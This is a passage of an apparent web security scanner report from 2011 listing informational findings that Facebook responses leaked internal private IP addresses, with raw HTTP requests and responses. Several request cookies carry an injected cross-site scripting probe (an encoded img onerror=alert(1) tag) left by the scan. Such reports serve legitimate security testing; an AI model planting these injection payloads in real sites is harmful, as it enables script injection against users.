Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ba0f78a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1c1d15cfc&relation=parent&transport=postmessage&frame=f25b8338e
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.99.85
X-Cnection: close
Date: Thu, 05 May 2011 01:04:18 GMT
Content-Length: 0

20.183. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.77.55

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16981bfec%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2033686f%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df220f88964%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e76da78%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1810035c4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff345970418%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20e0837e&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2e76da78&origin=http%3A%2F%2Ftechcrunch.com%2Ff345970418&relation=parent&transport=postmessage&frame=f20e0837e
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.77.55
X-Cnection: close
Date: Thu, 05 May 2011 01:19:26 GMT
Content-Length: 0

20.184. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.242.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3463475b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3763ee51%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3fcbb4c2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df364352c08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3991cd268%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2fc70151%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23183f85&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f364352c08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2fc70151&relation=parent&transport=postmessage&frame=f23183f85
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.242.41
X-Cnection: close
Date: Thu, 05 May 2011 01:44:32 GMT
Content-Length: 0

20.185. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.109.110

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df493a8d9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cfe5b4cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcd1ed894%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8066206%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15cb9af84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1d597cdc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11b7ba594&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f8066206&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1d597cdc8&relation=parent&transport=postmessage&frame=f11b7ba594
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.109.110
X-Cnection: close
Date: Thu, 05 May 2011 02:00:00 GMT
Content-Length: 0

20.186. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.205.40

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df202c4acb4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df359b7a35%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1fa7b6bc4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df901bc4ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b78e2d58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e3203268%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25c4a10b8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f901bc4ac&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2e3203268&relation=parent&transport=postmessage&frame=f25c4a10b8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.40
X-Cnection: close
Date: Thu, 05 May 2011 01:54:28 GMT
Content-Length: 0

20.187. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.157.59

Request

Response

20.188. http://www.facebook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.37.21.104

Request

GET /favicon.ico HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=xCqlG; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Sat, 04 Jun 2011 02:51:05 GMT
X-FB-Server: 10.37.21.104
X-Cnection: close
Date: Thu, 05 May 2011 02:51:05 GMT
Content-Length: 152

.PNG
.
...IHDR................a..._IDAT8.c...?.%.LXG.8...I.g. U3..m@B.....}...$....,..5...\.h.@~G.?.?...h.\....m.......H....83Q...@..........IEND.B`.

20.189. http://www.facebook.com/fayse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.139.21

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.190. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.188.21

Request

Response

20.191. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.166.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.37
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.192. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.184.27

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.184.27
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.193. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.218.112

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.194. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.65

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.195. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.16.121

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.196. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.145.27

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.27
Connection: close
Date: Thu, 05 May 2011 11:43:05 GMT
Content-Length: 20587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.197. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.139.61

Request

Response

20.198. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.158.27

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.158.27
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 20551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.199. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.163.83

Request

Response

20.200. http://www.facebook.com/home.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.103.77

Request

Response

20.201. http://www.facebook.com/images/policy/TRUSTe_EU.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/images/policy/TRUSTe_EU.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.193.31

Request

GET /images/policy/TRUSTe_EU.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/policy.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Sat, 04 Jun 2011 11:40:23 GMT
X-FB-Server: 10.52.193.31
X-Cnection: close
Date: Thu, 05 May 2011 11:40:23 GMT
Content-Length: 13208

.PNG
.
...IHDR.......L.....`Cr...3_IDATx^..........S.`...pv..%.8..p.E.Z......;.I.JR.!.!EPYAQf....)O.*..e..``Z....0.&.bQ#..`......v]x[Q..
Q.....o..>/3...._....I._e.6.F...iO..2v..Y...]x}K...&...x.v.\
...[SNIP]...

20.202. http://www.facebook.com/images/policy/TRUSTe_verify.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/images/policy/TRUSTe_verify.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.135.23

Request

GET /images/policy/TRUSTe_verify.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/policy.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
